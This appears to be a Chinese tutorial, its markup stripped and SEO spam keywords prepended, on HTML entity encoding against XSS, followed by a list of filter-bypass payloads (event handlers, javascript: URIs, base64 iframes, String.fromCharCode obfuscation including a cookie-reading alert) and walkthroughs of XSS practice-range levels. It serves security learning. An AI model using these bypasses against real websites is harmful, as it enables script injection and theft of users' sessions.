广州网站建设设计厂家,网上做视频赚钱的网站有哪些,北京市网上服务平台,四川seo关键词工具HTML实体化编码
为了避免 XSS 攻击#xff0c;会将编码为与#xff0c;这些就是 HTML 实体编码。
编码前编码后不可分的空格 (小于符号) (大于符号) (与符号)amp;″ (双引号)quot;’ (单引号)apos; (版权符…HTML实体化编码
为了避免 XSS 攻击会将编码为lt;与gt;这些就是 HTML 实体编码。
编码前编码后不可分的空格nbsp; (小于符号)lt; (大于符号)gt; (与符号)amp;″ (双引号)quot;’ (单引号)apos;© (版权符号)copy;
he.encode(img src/img) // #x3C;img src#x22;#x22;#x3E;#x3C;/img#x3E;// 转义
he.escape(img src/img) // lt;img srcquot;quot;gt;lt;/imggt;常见的绕过payload
img srcx onerroralert(1)
img src1 οnmοuseοveralert(xss)
a hrefjavascript:alert(1)baidu/a
a hrefjavascript:aaa onmouseoveralert(/xss/)aa/a
scriptalert(xss)/script
scriptprompt(xss)/script
input value οnclickalert(xss) typetext
input namename value οnmοuseοverprompt(xss) bad
iframe srcjavascript:alert(xss)iframe
iframe srcdata:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4
iframe srcaaa οnmοuseοveralert(xss) /iframe
iframe srcjavascriptcolon;promptlpar;xssrpar;/iframe
svg onloadalert(1)
input namename value οnmοuseοverprompt(xss) bad“”
input type“hidden” accesskey“X” onclick“alert(1)”
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,
111,107,105,101,41)) 适用于绕过黑名单 alert 在跨站中String.fromCharCode 主要是使到
一些已经被列入黑名单的关键字或语句安全通过检测把关键字或语句转换成为 ASCII 码
然后再用 String.fromCharCode 还原因为大多数的过滤系统都不会把 String.fromCharCode
加以过滤例如关键字 alert 被过滤掉那就可以这么利用 alert(document.cookie)
img src1 onerroralert(1)
img src1 onerroralert#40;1#41;实体化()
img src1 onerroralert#40#41
script\u0061\u006c\u0065\u0072\u0074(1)/script
img src1 οnerrοrlocationjavascript:alert(1)”
img src1 οnerrοrlocationjavascript:alert%281%29”靶场实战一
欢迎来到XSS挑战
Level 1
通过观察页面猜测因该是一个传参nametest可以下手 查看页面源代码 从这里我们可以看到它将name的参数值插入到了h2 /h2标签之间第一关没有过滤 payloadnamescriptalert(xss)/script
Level 2
一个搜索框故技重施失败了判断他有过滤 查看源代码上面一行是查询的回显可以看到被实体化编码了下面一行被双引号包裹 上面的实体化编码无法绕过了现在的目标转化为下面一行那就是闭合 payload: scriptalert(1)/script// 或者 scriptalert(1)/script 实测也可以不用注释后面的说明HTML属于弱类型校验不严格另外查看这关源代码调用的函数是 htmlspecialchars() 它的作用就是让 和 被HTML实体化编码 PHP htmlspecialchars() 函数 Level 3
还是搜索框故技重施x2无果看源代码 这波看似没办法搞了两边都被实体化了 仔细一想两个尖括号以及被ban掉 特殊事件 onmouseover onclick onfocuse 的介绍链接 HTML onmouseover 事件属性 | 菜鸟教程 HTML onclick 事件属性 | 菜鸟教程 HTML onfocus 事件属性 | 菜鸟教程 函数效果οnmοuseοveralert(1)鼠标指针移至图片之上时弹窗οnclickalert(1)输入域获得焦点时弹窗οnfοcusalert(1)单击鼠标时弹窗
还有一个问题就是闭合这两个引号闭合前面的注释或者闭合后面的这里跟上一关的标签闭合不一样是比较严格的不闭合属性中的值会无法执行 payload onmouseoveralert(1) // 或者 onmouseoveralert(1) x
靶场实战二
alert(1)
0x00
啥也没有直接来吧
0x01
前面的textarea标签有个特性无法创建其他标签那就闭合掉
0x02
input标签直接onmouseover闭合连招 还有种方法是闭合新开标签 scriptalert(1)/script 当然也可以用img srcx onerroralert(1)也是很好用的
0x03
过滤了左右括号 那就用反引号绕过
